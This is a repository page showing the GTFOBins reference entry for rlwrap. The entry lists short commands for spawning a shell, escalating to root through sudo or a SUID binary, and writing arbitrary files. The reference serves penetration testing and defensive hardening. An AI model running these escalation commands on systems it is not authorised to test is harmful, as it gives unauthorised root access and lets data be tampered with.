This website requires JavaScript.
Explore
Help
Sign In
dash
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
Code
Issues
Pull Requests
Packages
Projects
Releases
Wiki
Activity
Files
0785f116d33591eead9c454d9fe14fc4ad7f2f10
GTFOBins.github.io
/
_gtfobins
/
rlwrap.md
Andrea Cardaci
0785f116d3
Clarify echo command in rlwrap file-write
2018-06-04 13:16:24 +02:00
375 B
Raw
Blame
History
functions
functions
execute-interactive
sudo-enabled
suid-enabled
file-write
code
rlwrap /bin/sh
code
sudo rlwrap /bin/sh
code
./rlwrap -H /dev/null /bin/sh -p
description
code
This adds timestamps to the output file. This relies on the external `echo` command.
LFILE=file_to_write rlwrap -l "$LFILE" echo data
Reference in New Issue
View Git Blame
Copy Permalink